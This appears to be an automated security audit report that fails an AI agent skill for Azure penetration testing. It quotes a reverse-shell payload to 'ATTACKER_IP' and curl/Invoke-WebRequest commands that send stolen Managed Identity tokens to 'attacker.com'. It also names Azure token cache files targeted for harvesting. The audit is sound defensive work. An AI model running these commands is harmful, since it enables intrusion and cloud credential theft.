azure-pentesting
Fail
Audited by Gen Agent Trust Hub on May 12, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides explicit payloads for establishing reverse shells on target systems. Specifically, 'references/persistence-techniques.md' contains payloads for both Linux ('bash -i >& /dev/tcp/ATTACKER_IP/443') and Windows environments to maintain persistent access through shell hijacking.
- [DATA_EXFILTRATION]: The methodology contains automated instructions for exfiltrating sensitive Azure Managed Identity tokens and metadata. Evidence in 'references/persistence-techniques.md' shows 'Invoke-WebRequest' and 'curl' commands configured to send stolen tokens to 'https://attacker.com/collect' and 'https://attacker.com/c'.
- [CREDENTIALS_UNSAFE]: 'SKILL.md' provides guidance on harvesting sensitive authentication artifacts from local cache files, specifically targeting paths like '~/.Azure/msal_token_cache.json' and 'azureProfile.json' which contain access and refresh tokens.
- [EXTERNAL_DOWNLOADS]: The skill directs the installation of numerous third-party penetration testing tools (e.g., 'AADInternals', 'MicroBurst', 'o365spray') from public GitHub repositories. These tools are unversioned and represent a potential supply chain risk as they are not integrity-verified by the skill creator.
- [REMOTE_CODE_EXECUTION]: The skill documents techniques for remote code execution via Azure features such as Custom Script Extensions, Run Command, and Automation Runbooks to execute arbitrary payloads on cloud virtual machines and services.
Recommendations
- AI detected serious security threats
Audit Metadata